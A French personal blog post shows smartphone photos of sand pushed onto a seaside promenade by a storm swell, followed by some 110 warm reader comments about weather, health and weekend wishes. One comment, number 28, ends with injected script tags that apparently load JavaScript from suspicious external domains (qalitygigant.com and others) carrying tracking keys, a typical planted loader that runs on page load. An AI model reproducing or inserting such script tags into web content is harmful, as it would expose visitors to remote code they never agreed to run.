• Sur la " Grande Plage " !! ..

    Pendant les marées !

    Pendant les marées !

    .. Un petit détour pour voir les dégâts durant la nuit car forte houle !

    . La houle apporte son lot de sable jusque sur la promenade alors grand

    nettoyage avant le retour des vacanciers ! .. 

    .. Clichés pris avec mon Smartphone donc de qualité moyenne . Bon début

    de semaine et à Lundi chez vous ! ...


  • Commentaires

    110
    Lundi 2 Mars 2020 à 08:27

    Bonjour escapade 

    Un petit passage pour te souhaiter une douce journée pas très bonne chez nous gros orage cette nuit et la météo l'annonce pour toute la semaine 

    gros bisous 

    Marlène

    109
    Samedi 29 Février 2020 à 23:33
    lavandine

    Il faut que la plage soit propre pour accueillir les vacanciers. Une plage c'est un éternel recommencement.

     

    J'aime bien ta nouvelle bannière.

     

    Gros bisous et bonne nuit !

    108
    Mardi 25 Février 2020 à 05:39

    Bonjour  Escapade

    Une semaine qui a bien mal démarrée

    avec un crachin qui n'a cessé de tomber

    accompagné d'un petit vent plutôt frais!

    Le plus agréable c'est de voir que la nature,

    commence a étaler ces couleurs multiples,

    sans la moindre aide du dieu soleil RA

    Pour cette deuxième journée

    ,je vous la souhaite a vos désirs!

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    107
    Dimanche 23 Février 2020 à 14:52

    Salut,

    On a beaucoup de vent (90km/h) et aussi pas mal d'averses. La météo n'annonce pas de beau temps mais seulement une température au dessus de la moyenne.

    On reste au chaud à regarder la télé mais on zappe souvent à cause des reportages sur Macron.

    Bonne semaine

    106
    Dimanche 23 Février 2020 à 12:05

    Bonjour Escapade 

    Après chaque tempête les plages ont besoin d'un nettoyage ... ça souffle ce matin. Bon dimanche  bises 

    105
    Dimanche 23 Février 2020 à 05:51

      Bonjour  ESCAPADE

    C'est rapidement que je passe,

    pour nous c'est un jour relâche

    et blog en pause après mon passage

    chez mes ami e s fidèles.

    Jour avec le deuxième fils, sa compagne

    et nos petits enfants trois & quatre

    UNE FILLE ET UN GARS

    belle et bonne journée de dimanche

    Que le soleil daigne vous accompagner...

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

     

    104
    Dimanche 23 Février 2020 à 03:28

    bonjour escapade avant de retourner au lit quelques heures mais pour le moment j en aie pas envie de trop et j aie encore le temps jusqu a 8 heures au moins 

     ce matin il fait 10 degres et la pluie va nous arrivée par l ouest bien sur 

     hier a  été une journée agréable avec les anciens salariés ou travaillait mon mari , mais déjà en un an il y en a 4 de moins dcd hélas ça fait beaucoup 

     passe un agréable dimanche 

     je t embrasse

    103
    Dimanche 23 Février 2020 à 00:29
    Bonjour escapade Passe un bon dimanche Avec amitiés René
    102
    Samedi 22 Février 2020 à 18:18

    bonsoir ma belle , j'espère que tu as passé un bon samedi , quelques courses ce matin et cet après-midi , et avec un beau soleil , du moins pour la matinée ,et du vent , cette nuit , belle gelée blanche , bonne fin d'après-midi et bonne soirée , bisous

    101
    Samedi 22 Février 2020 à 16:00

    Salut,

    Le temps est humide et il fait quand même frais.

    Ca piaille dans les haies .
    Je mets 3 gamelles de graines et c'est bouffé en deux jours.

    Bon week-end

    100
    Samedi 22 Février 2020 à 15:45

    bon dimanche a lundi

    bisous

    99
    Samedi 22 Février 2020 à 15:03

    Bonjour ESCAPADE       Je viens te souhaiter un très bon week end ensoleillé ; il faut en profiter d'aller se promener et aussi d'etre au jardin. Bonne fin de journée ; bisous        COCO

    98
    Samedi 22 Février 2020 à 13:04

    Bonjour escapade.

    Un sourire c'est grandiose

    C'est une barque qui ramène un peu d'espoir

    Un sourire c'est une vie

    Alors voici le mien aujourd'hui

    Accompagné de mon bonjour

    Et de mon amitié

    Je te souhaite une bonne après midi et bon dimanche .

    Bisous. kettyn.

    97
    Samedi 22 Février 2020 à 12:19

    Bonjour Chris,

    Un petit bonjour de Rambouillet, où le soleil brille !!

    J'espère que tu vas bien ? 

    Bon samedi, grosses bises, Véronique

    Afficher l’image source

    96
    Samedi 22 Février 2020 à 12:17

    coucou,je passe ce matin te souhaiter un très bon weekend car il vas faire un soleil magnifique alors je vais en profiter pour faire des photos,bises

    95
    Samedi 22 Février 2020 à 08:30

    Bonjour Escapade, ma petite visite du samedi afin de te souhaiter de passer

    une excellente journée et un bon week-end.

    Bisous.

    94
    Samedi 22 Février 2020 à 06:29

    Bonjour  Escapade

    Après le vendredi qui termine

    les contraintes de la semaine.

    Le repos n'est il pas le bienvenu,

    par une bonne grâce matinée

    pour reprendre des forces et

    se détendre pour retrouver

    la bonne humeur, la joie des rencontres

    Je vous souhaite un super week – end!

    a la semaine prochaine...

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    93
    Samedi 22 Février 2020 à 00:35

    Bonjour escapade

     

    Je te souhaite un agréable week-end

     

    Avec amitiés

     

    René

     

    92
    Vendredi 21 Février 2020 à 23:02

     

    Bonsoir chère Esapade,

    J’ai un tout petit moment pour te parler/écrire.

    Voilà finalement les enfants n’arrivent que demain, mais là je leur prépare le repas pour être plus souvent avec eux. Ils feront peut être un dessert. Ou bien pourront améliorer le fondant au chocolat que j’ai gagné pour mon anniversaire chez Picard. Un vrai cadeau je n’avais rien à acheter en plus !

    Bon nous verrons bien lorsqu’ils seront là. Maintenant je dois retourner à la cuisine car mon plat a besoin de moi.

    Bisous et amitié à toi. Bonne soirée, bon weekend et prends bien soin de toi

     

    91
    Vendredi 21 Février 2020 à 18:09

    Bonjour ma belle

    Je viens te souhaiter une belle fin de journée et un doux weekend

    En espérant que tu vas bien...

    Que vas tu faire ce weekend, le beau temps est annoncé

    Moi aujourd'hui j'ai nettoyer un peu dehors et quelques plantations, et dimanche une balade.

    A bientôt gros bisous Jasmine.♥

    Résultat de recherche d'images pour "bonne fin de semaine printemps animé de lune"

    90
    Vendredi 21 Février 2020 à 18:07

    Salut

    Le temps s'améliore mais on a toujours des averses.

    Avec la douceur on pense faire une balade.

    Bon week-end

    89
    Vendredi 21 Février 2020 à 16:49

    coucou!!je passe te souhaiter un bon weekend!!!avec mes nouveaux antibios,je vais un peu mieux!mais pas la grande forme,en plus il ne fait pas chaud!!!!a lundi et gros bisous

    88
    Vendredi 21 Février 2020 à 14:59

    coucou j'espère que ta du soleil ici oui 

    ce matin doc une crise arthrose  puis angoisse 

    bisous  bonne fin de journée

    87
    Vendredi 21 Février 2020 à 12:47

    petit coucou avant le weekend,il fait un soleil magnifique c'est vraiment le printemps chez nous pourtant nous sommes en hiver,je te souhaite un très bon Vendredi,bises

    86
    Vendredi 21 Février 2020 à 12:37

    De plus en plus les tempêtes causent des dégâts, il est à craindre des catastrophes dans les villes côtières.Amitiés...Jacques

    85
    Vendredi 21 Février 2020 à 11:01


    Déjà vendredi ! Bonne journée Escapade

    84
    Vendredi 21 Février 2020 à 09:29

    ☀️Bonjour Escapade.

    Y a t'il quelqu'un derrière cet écran ?

    Es tu là !? ..........Oui, non !?

    Ce n'est pas grave tu trouveras bien

    Mon petit message

    Je venais juste te faire un petit coucou

    Je te souhaite une belle journée

    Dernière journée de vacances 

    Jallen repart ce soir voir son petit-frère

    Et lundi le chemin de l'école 

    Bises  ton amie ❤️ 

    83
    Vendredi 21 Février 2020 à 08:34

    Bonjour Escapade.
    C'est avec un temps qui s'annonce bien beau, que je te souhaite un bon week-end.
     Bisous de nous deux.

     



     

     

    82
    Vendredi 21 Février 2020 à 08:03

    Bonjour Escapade, nous voici vendredi et c'est le dernier jour avant le week-end.

    Ici même le temps change, car nous avons une petite gelée matinale.

    Cela promet du soleil c'est bien.

    Je te souhaite une belle journée.

    Bisous.

    81
    Vendredi 21 Février 2020 à 07:21

    Bonjour Escapade
    j'espère que les dégâts n'ont pas été trop important
    temps claire avec des gelées matinales
    je te souhaite une agréable journée  ainsi qu’un bon week-end
    gros bisous

    80
    Vendredi 21 Février 2020 à 05:13

    Escapade Bonjour  

    Le vendredi est un jour attendu

    car il est le dernier de la semaine!

    Il est celui qui précède le week-end!

    Après lui Il ne vous reste plus qu'a

    bien préparer les deux jours suivants

    pour en profiter à fond la caisse!

    Que ce vendredi soit splendide et riche

    en rencontre et merveilleux moments.

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    79
    Vendredi 21 Février 2020 à 03:29

    bonjour escapade avec la froideur de la nuit ce matin il n efera pas chaud du tout peut etre un petit degré et encore mais s il peut y avoir du soleil dans la journée il sera le bienvenue ça c est plus que sur 

     hier j aie été pour la premiere fois au cabinet de la kiné , c était un peu plus long qu a la maison  un quart d heure de plus c est appreciable 

     passe un bon vendredi ainsi qu un bon Week end 

     je t embrasse

    78
    Vendredi 21 Février 2020 à 01:45
    Bonjour escapade Termine bien la semaine Avec amitiés René
    77
    Jeudi 20 Février 2020 à 22:15

    bonsoir ma belle ,  ,du côté météo , c'est toujours la grisaille , bonne soirée , bisous

    76
    Jeudi 20 Février 2020 à 16:34

    bonsoir je rentre du soleil 16 degré

    passe une bonne soiré

    bisous

    75
    Jeudi 20 Février 2020 à 16:01

    Salut

    Le temps est doux avec de temps en temps une petite averse .

    On a fait les courses et les promos sont nombreuses.

    Par contre le prix de l'essence remonte pourtant la Chine est toujours fermée?

    Bonne journée

    74
    Jeudi 20 Février 2020 à 15:34

    Coucou, merci de ta gentille visite, et je suis heureuse de te faire sourire avec mes bêtises sur mon blog !!! Gros bisous

                                         Résultat de recherche d'images pour "bisous betty boop"

    73
    Jeudi 20 Février 2020 à 14:14

    Bonjour Chris,

    Un petit bonjour de Rambouillet. Temps bien gris aujourd'hui ... Passe une bonne journée, grosses bises, Véronique

       Afficher l’image source

    72
    Jeudi 20 Février 2020 à 12:08

    Bonjour Escapade ; passe un beau jeudi.

    71
    Jeudi 20 Février 2020 à 08:16

    Bonjour Escapade, nous voici au milieu de la semaine, c'est fou comme le temps passe vite.

    La météo par contre elle ne change pas beaucoup, nous sommes toujours dans la grisaille.

    Je te souhaite de passer une belle journée.

    Bisous.

    70
    Jeudi 20 Février 2020 à 08:07

    coucou Escapade 

    tu as raison il faut laisser un peu le blog de coté soit pour se reposer ou faire certaines choses que l'on ne peut pas faire lorsque le blog nous occupe moi c'est un peu de repos se matin le soleil et normalement jusqu'à dimanche alors je vais en profiter et me reposer je te souhaite une douce fin de semaine je te dis à lundi gros bisous amitié

    Marlène

    69
    Jeudi 20 Février 2020 à 07:07

    ♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫

    Bonjour Escapade  ❤️

    Comment va tu?? bien j'espère

    Avec toute ma tendresse

    Je t'envoie mes plus douces pensées

    Et te souhaite une bonne journée

    Avec toi dans la joie et la bonne humeur 

    ♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫♫

    68
    Jeudi 20 Février 2020 à 04:23

    Bonjour Escapade

    L’amitié est comme un levé du jour

    qui nous accompagne chaque matin…

    Elle brille sur les relations pour les éclairer

    d'une superbe lumière naturelle

    faite d’affection et de tendresse.

    je vous souhaite une très bonne journée!

    Que cette dernière soit pleine de bonnes

    et agréables surprises et de douceurs.

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    67
    Jeudi 20 Février 2020 à 02:57

    comment ça va ce matin ma chere escapade est ce que ton epaule va enfin mieux et ton etat general aussi , moi hier j avais la tete bien folle fallait surtout pas faire de mouvements brusques , ce matin j aie encore bien mal a la nuque 

     allez ma petite pause dans la nuit est finit je retourne au lit 

     tres bon jeudi 

     je t embrasse

    66
    Jeudi 20 Février 2020 à 00:58
    Bonjour escapade Passe une bonne journée Avec amitiés René
    65
    Mercredi 19 Février 2020 à 21:47

    bisous douce nuit 

    a la caisse du super marche

    64
    Mercredi 19 Février 2020 à 15:18

    Salut
    On a de la douceur mais aussi de la pluie.
    Heureusement on n'a plus de vent.
    Bonne journée

    63
    Mercredi 19 Février 2020 à 08:10

    ❤️☀ Bonjour  Escapade ❤️☀ 

     

    Si mon stylo était magique

    avec des mots en herbe

    j'écrirais des poèmes superbes,

    avec des mots en cage,

    j'écrirais des poèmes sauvages.....

     

    Si mon stylo était artiste

    avec les notes les plus bêtes,

    j'écrirais des poèmes en fête,

    avec des mots de tous les jours

    j'écrirais des poèmes d'amour....

     

    Mais mon stylo est un farceur

    qui n'en fait qu'a sa tête

    et ce matin te fait des pirouettes

    avant de t'écrire :

    Passe une très belle journée.....

    Gros Bisous

    62
    Mercredi 19 Février 2020 à 08:04

    Bonjour Escapade, la tempête souffle encore chez toi?

    Ici c'est calme , c'est vrai que nous sommes situés au milieu de la France.

    Je te souhaite une belle journée.

    Bisous.

    61
    Mercredi 19 Février 2020 à 07:43

    coucou escapade

    Mon petit passage matinal pour te souhaiter une douce journée déjà la moitié du mois de passé le temps va si vite....

    douce journée gros bisous 

    Marlène

    60
    Mercredi 19 Février 2020 à 05:45

    bonjour ma chere escapade  , j attends le passage du porteur pour avoir mon journal c est une habitude tous les matins et j aime bien quoiqu il ne nous apprend pas garnd chose de plus que sur l ordi et a l année ça reste tres cher quand meme pres de 400 euros , faudra qu on y réflechisse a ça 

     passe un bon mercredi 

     je t embrasse

     

    59
    Mercredi 19 Février 2020 à 05:35

    Bonjour  Escapade

    Que cette journée de mercredi

    ne soit pas trop dans l'arrosage,

    que le vent ne s'agite pas trop,

    quand a la couleur du ciel

    qu'il reste plutôt uni, comme le bleu

    lui va si bien, cela convient!

    Pour le soleil son rayon sera

    comme a l'habitude le bienvenu.

    Que ce jour vous apporte le meilleur ...

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    58
    Mercredi 19 Février 2020 à 01:15
    Bonjour escapade Déjà la moitié de la semaine Passe une bonne journée Avec amitiés René
    57
    Mardi 18 Février 2020 à 21:27

    bonsoir ma belle ,ben , y a du boulot  , j'espère que tu as passé une bonne journée qui fut ensoleillée et venteuse , je n'ai  pas  voulu mettre sécher mon linge dehors car j'avais déjà eu froid en allant chercher le pain , bonne soirée , bisous

    56
    Mardi 18 Février 2020 à 17:53

    En effet ça doit être la galère pour récupérer tout cela, jusqu'à la prochaine tempête !!! on est gâté en ce moment !!!

                                              Résultat de recherche d'images pour "tempète gif"

    55
    Mardi 18 Février 2020 à 15:34

    Salut,

    Le temps s'arrange , de temps en temps il y a une averse.

    Bonne journée

    54
    Mardi 18 Février 2020 à 13:21

    et oui ont vas commencer a faire du nettoyage sur les plages,j'espère que tu vas bien,,il fait lourd chez nous , les arbres commencent a fleurir,je te souhaite un très bon Mardi bises

    53
    Mardi 18 Février 2020 à 09:51

    Ce mardi commence bien pour la météo.... pourvu que ça dure !

    Bonne journée Escapade

    52
    Mardi 18 Février 2020 à 09:50
    Bonjour chère Ch. oui les dégâts sont importants avec ces deux tempêtes que nous venons de subir. Bientôt le retour des martiens mdr alors profite bien du calme. Belle semaine à toi et gros bisous.
    51
    Mardi 18 Février 2020 à 09:43

    Ici aussi c'est le nettoyage et les réparations..... accès de certains quais sont interdite..Douce journée bise.

    50
    Mardi 18 Février 2020 à 08:18

    coucou escapade

    Un petit passage rapide car j'ai rendez-vous ce matin pour ma voiture 

    passe une douce journée gros bisous 

    Marlène

    49
    Mardi 18 Février 2020 à 08:07

    Bonjour Escapade, oui je pense que le temps s'améliore vite et c'est tant mieux.

    Je te souhaite de passer un bon mardi.

    Bisous.

    48
    Mardi 18 Février 2020 à 07:36

    Bonjour Escapade

    Heureusement que la ville est bien équipée en engins pour dessabler la promenade Si cela devait se faire manuellement , les vacanciers ne seraient pas heureux .
    Bises

    47
    Mardi 18 Février 2020 à 04:24

    Bonjour  Escapade

    J'espère que vous avez bien commencé

    la semaine, et que durant toute celle-ci,

    vous aurez courage et motivation.

    Côté météo rien qui ne devrait

    nous changer de la présence du vent «acceptable»

    de la pluie et de quelques rayons du soleil!

    On ne peut vraiment parler d'hiver,

    des températures qui sont le plus souvent

    entre dix et treize degrés, il nous reste

    encore trois semaines avant l'arrivée

    de la saison du printemps après tout....

    Je vous souhaite une belle journée de mardi ,

    qu'elle soit remplis de petits bonheurs.

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.

    46
    Mardi 18 Février 2020 à 04:07

    bonjour escapade avec 3 degres ce matin et en esperant qu il fasse beau aujourd hui car hier on a eu pleins de fortes giboulées de grele ce qui donne les 3 degres ce matin sans doute 

     la kiné est venue ici hier pour la derniere fois  , jeudi je devrais aller chez elle et ce pour un certain temps je pense , oh je marche un peu mieux mais pas beaucoup encore c est long tout ça quand meme 

     ce matin nous devons aller chercher un colis a la poste alors je demanderais a mon mari si le temps le permet de m emmener un peu au parc pour marcher justement car labas c est bien large et droit , je ne ferais pas le tour ça c est sur mais au moins marcher un peu 

     passe un bon mardi 

     je t embrasse 

    45
    Mardi 18 Février 2020 à 00:42
    Bonjour escapade je partage l'avis de Sylvie Passe une bonne journée Avec amitiés René
    44
    Lundi 17 Février 2020 à 23:44

    Coucou chère Escapade,

    hé oui ces vents fous font des dégâts sur les côtes. ILs ont travaillé un peu tôt à mon avis pour nettoyer le sable, car des tempêtes il risque d'y en avoir encore!

    Bon courage mon amie et douce nuit et gros bisous.

    43
    Lundi 17 Février 2020 à 21:50

    Avec ces tempêtes, les côtes dérouillent beaucoup, et elles arrivent coup sur coup en ce moment...
    Il devait y avoir un sacré travail pour nettoyer.
    Bises et bonne soirée

    42
    Lundi 17 Février 2020 à 20:56

    Du travail après chaque tempête, et il y en a de plus en plus

    Passe une belle semaine

    Bisous

    41
    Lundi 17 Février 2020 à 19:34

    Bonsoir Chris,

    du boulot en perspective !! ben ton smartphone doit être de bonne qualité, car tes photos sont bien nettes !

    Bonne soirée, bises, Véronique

      Afficher l’image source

    40
    Lundi 17 Février 2020 à 19:08

    Bonsoir ma douce amie. Ton smartphone fais de belles photos et cela montre à quel point il y a eu du nettoyage à faire avec ces tempêtes et j'espère que tu n'as pas eu de dégâts. Merci pour ta fidélité à mon blog. J'ai un souci ce soir avec mon PC, quand je tape sur mon clavier çà rame d'enfer, demain est un autre jour et je verrai de quoi cela peut venir.Douce soirée et gros bisous d'amitié.

    39
    Lundi 17 Février 2020 à 19:07

    HELLO   ESCAPADE

    que de degats partout

    ici encor la pluie

    bonne soiree   bisousss

    38
    Lundi 17 Février 2020 à 18:32

    Beaucoup de vent hier et aujourd'hui pluie.

    Bonne soirée

    37
    Lundi 17 Février 2020 à 18:11

    Coucou ma tite Escapade,

    Et bien oui il faut nettoyer.

    Je passe voir comment tu vas et si tu as passé un bon week end.
    Le temps est très changeant, mais on ne peut pas vraiment dire que l'hiver soit très froid.
    A notre petite station de ski, il n'y a pratiquement pas de neige, les canons vont devoir se mettre en marche, car les vacances ici sont à la fin de semaine, sinon pas de ski oups.
    Je te souhaite une belle semaine, mais surtout sans intempérie, car les tempêtes sont très présentes depuis quelques temps.
    Gros bisous.

    Lolli❤

    36
    Lundi 17 Février 2020 à 17:34

    Bonjour CH

    C'est avec la pluie que je viens te souhaiter un bon début de semaine.

    J'espère que tu as passé un bon weekend, moi quelques plantations

    Et hier dimanche une balade nature....A bientôt gros bisous Jasmine.♥

    Résultat de recherche d'images pour "photo anime bonne semaine"

    35
    Lundi 17 Février 2020 à 17:23

    bonsoir et bonne semaine

    j'espère que tout va chez toi

    bisous

    34
    Lundi 17 Février 2020 à 16:46

    Les tempêtes font tellement de dégâts que le boulot de nettoyage est monstre après leurs passages.

    Encore vent, pluie dans le Nord mais un peu moins fort que ce weekend où l'on a eu des frayeurs mais pas de dégâts à la maison … ouf !

    Bises amicales!

    Nicole

    33
    Lundi 17 Février 2020 à 15:55

    Salut,

    Et oui le nettoyage c'est nécessaire.
    La tempête est passée sans faire de dégât chez nous .
    Je pense aux bretons qui ont eu des problèmes.
    Bonne semaine

    32
    Lundi 17 Février 2020 à 13:34

    Bonjour escapade .

    ces temps ci avec les intempéries il y a beaucoup de dégâts .

    Une nouvelle semaine qui démarre ,avec la pluie ,ce n'est pas folichon ,mais faut faire avec .

    Je te souhaite un bon lundi et une une bonne semaine .

    Dernière semaine des vacances .

    Bonne et agréable après midi .

    Bisous. kettyn.

    31
    Lundi 17 Février 2020 à 13:21

    coucou ,je viens te souhaiter une bonne semaine!!je vais un peu mieux ,mais bon je suis hs!!et ton bras ,comment va t'il??? ha faut toujours avoir quelque chose!!il y a des endroits ou il y a eu des gros degats!!pffffffff

    a bientot et gros bisous

    30
    Lundi 17 Février 2020 à 13:21

    Bonjour Escapade

    C'est l'heure du ménage sur les plages, il y a de quoi faire avant les vacances !

    Bonne journée, Bises

    29
    Lundi 17 Février 2020 à 11:47

    Bon début de semaine

    Bisous

    28
    Lundi 17 Février 2020 à 11:32

    Bonjour Escapade.

    Nous avons eu du beau temps pour le week-end et ce matin il ne fait pas très chaud et le temps est à la neige.

    J'espère que tout va bien et je te souhaite une bonne semaine.

    Bisous de nous deux.

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1581935547995" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    27
    Lundi 17 Février 2020 à 11:27

                                                                                            Lundi 17 février 2020

    Tant que pas de dégâts humains ça va 

    Mais oui ça détruit la nature 

    Prudence oblige 

    Bisous 

    Bonne semaine 

    26
    Lundi 17 Février 2020 à 11:22

    Luc a bien raison pour le premier cliché,  humour, humour ..

    mais triste de constater ces dégâts, ici rien de grave ouf ,

    les vacanciers ont été un peu déçus, ils s'attendaient à voir une mer déchaînée

    mais rien....

    Heureusement qu'ils réagissent vite chez toi ma chère Christiane,

    prends bien soin de toi,

    Belle journée douce et ensoleillée,

    Bises amicales de Christiane 2

    25
    Lundi 17 Février 2020 à 11:05

    Bonjour et bien ils ont du travail c'est pas normal d'avoir ainsi des tempêtes il faut faire avec pas le choix bonne journée bisou Claudine Daniel

    24
    Lundi 17 Février 2020 à 10:38

    avec toutes ces tempêtes à répétition,les touristes ne sont pas prets d'arriver!!

    bon début de semaine.bisous.

    23
    Lundi 17 Février 2020 à 10:22

    Finalement il vaut mieux ça que d'emporter le sable au large....

    La semaine commence dans un calme nettement plus agréable !

    Bon lundi Escapade

    22
    Lundi 17 Février 2020 à 10:21

    Sur la première photo, le mec s'est gouré de côté pour pêcher...yeshappyyes

    Terrible ces tempêtes à répétition...

    Bisous et bonne journée

    21
    Lundi 17 Février 2020 à 10:19

    bonjour, ici le vent s'est calmé ça devait être la furie mais pas sorti pour prendre  des photos ,peur de m'envoléehappy!! bonne semaine bisoussss

    Fichier

    20
    Lundi 17 Février 2020 à 09:53

    Bonjour ESCAPADE     Eh oui en  ce moment nous ne sommes pas gatés avec ces tempetes surtout en bord des plages ; heureusement je vois qu'ils entretiennent bien ; bon lundi. Bisous     COCO

    19
    Lundi 17 Février 2020 à 09:26

    Il faut être réactif les touristes arrivent

    JP

    18
    Lundi 17 Février 2020 à 09:22

    bonjour Escapade , ah oui ça on a tellement de vent et de tempête ! tout s'envole et après il faut réparer !!  ... ,   belle balade quand il y aura le soleil  , pour nous c'est  la pluie ce matin  ! gros bisous belle semaine A +  merci pour tes coms et ++++

    17
    Lundi 17 Février 2020 à 09:16

    Bonjour Esacapade

    Ils entretiennent c'est déjà ça

    Je te souhaite une bonne journée, bisous

    16
    Lundi 17 Février 2020 à 09:14

    Bonjour Escapade, 

    et oui ça fait des dégâts, 

    Passe une bonne journée, gros bisous

    Nadine 

    Résultat de recherche d'images pour "bonne journée gif animé"

    15
    Lundi 17 Février 2020 à 08:17

    Bonjour Escapade, c'est vrai qu'après une tempête, elle laisse toujours derrière elle beaucoup de dégâts.

    C'est incontrôlable car la nature est plus forte que l'humai.

    Je te souhaite une belle journée.

    Bisous.

    14
    Lundi 17 Février 2020 à 07:49

    chez nous aussi  au  bord des gréves çà se dégrade 

     le sable  est passé dans les propriétés  , cette tempête à été bien  rude , la un peu de calme .

     bonne nouvelle semaine 

     kénavo 

    13
    Lundi 17 Février 2020 à 07:48

    ça a soufflé en effet,  chez toi il y a du sable, sur certaines plages, c'est tout u tas de détritus qui arrivent et jonchent les plages. bises.celine

    • Voir les réponses
    12
    Lundi 17 Février 2020 à 07:37

    Bonjour escapade

    Oui j'ai vu cela à la télé c'est inquiétant de voir que c'est de plus en plus et les tornades qui s'y mette en plus dans certains endroits de plus des imprudents qui brave la tempête de gros malins qui mettent la vie des secouristes en danger par leurs bêtises doux lundi escapade gros bisous

    Marlène

    11
    Lundi 17 Février 2020 à 07:32

    Bonjour Escapades !

    Oui mais quand la houle se déchaîne c'est beau !!!

    Bisous !

    10
    Lundi 17 Février 2020 à 07:02

    Bonjour Escapade

    Eh oui les bords de plage sont toujours les plus touchés,  heureusement le nettoyage  rendra la plage aussi belle qu'avant  ,bonne semaine ma douce , big bises 

     

    9
    Lundi 17 Février 2020 à 06:42

    Bonjour Escapade
    je vois que vous avez eu des dégats mais j'espère qu'ils  n'ont été p&s trop important
    pluie et ciel couvert en ce lundi
    je te souhaite une agréable journée  ainsi qu’un bon début de semaine
    bisous

    8
    Lundi 17 Février 2020 à 06:36

    C'est le problème des villes côtières... et quand la mer se déchaîne, il y a forcément des dégâts ! 

    Très bonne journée et gros bisous

    7
    Lundi 17 Février 2020 à 06:25
    CathyRose

    Pour le coup ça a soufflé très, très fort en Normandie et en Bretagne également, les éléments se déchaînent ! Beaucoup de dégâts en Grande-Bretagne aussi ...  Pourvu que ça se calme maintenant !
    Belle semaine, bisous !
    Cathy

    6
    Lundi 17 Février 2020 à 06:18

    J'ai vu aux infos..que de dégâts !!!

    Bonne journée Chris gros bisous 

    5
    Lundi 17 Février 2020 à 05:48

    Ici aussi la tempête a fait rage.

    4
    Lundi 17 Février 2020 à 05:39

    bonjour escapade  grrrr que de dégats de partout autour de nous et chez nous enfin chez le fils ça devient bien demoralisant , moi en ce moment avec ce temps j aie je peux le dire le moral en berne carrément , pas un rayon de soleil pour nous faire du bien la c est vraiment trop moche cet hiver qui ne ressemble a rien du tout 

    autrement hier j aie pu marcher un peu je dis bien un peu sans béquille est ce le vélo qui me fait du bien en tout cas j en fais un peu tous les jours et aujourd hui la kiné vient pour la derniere fois a la maison apre sc est moi qui irait a son cabinet ce sera moins pratique pour nous mais pour elle se sera mieux bien sur 

     passe un bon debut de semaine 

     je t embrasse amie lointaine 

    3
    Lundi 17 Février 2020 à 05:19

    Oh oui ça souffle fort depuis une semaine, pas facile et en plus beaucoup de pluie chez nous 

    2
    Lundi 17 Février 2020 à 04:12

    Bonjour  Escapade

    Après trois jours sous la pluie,

    beaucoup de cours d'eau sont en goguette

    les cultures sont a nouveau envahies!

    Quand a Éole dieu des vents

    il c'est enfin mis au repos

    en fin d'après midi,si seulement

    il pouvait prendre ces vacances,

    ,,beaucoup d'entre nous serions heureux!

    Maintenant je vous souhaite de profiter,

    et de pouvoir aussi souffler.

    Bon lundi & bonne semaine... 

    Amitiés{*=*}Bisous

    . * J-G-R-C-202*.



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :